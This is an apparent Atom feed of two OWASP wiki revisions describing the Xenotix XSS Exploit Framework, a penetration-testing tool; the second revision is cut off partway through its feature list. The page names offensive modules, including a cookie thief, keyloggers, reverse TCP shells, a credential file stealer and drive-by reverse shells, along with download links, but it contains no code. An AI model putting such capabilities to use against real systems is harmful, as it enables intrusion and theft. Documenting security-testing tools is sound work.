		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186015</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186015"/>
				<updated>2014-11-26T04:14:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: added website&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|R8AgEWPFJ1g}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186014</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186014"/>
				<updated>2014-11-26T04:00:45Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: Changed .RAR to .ZIP&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
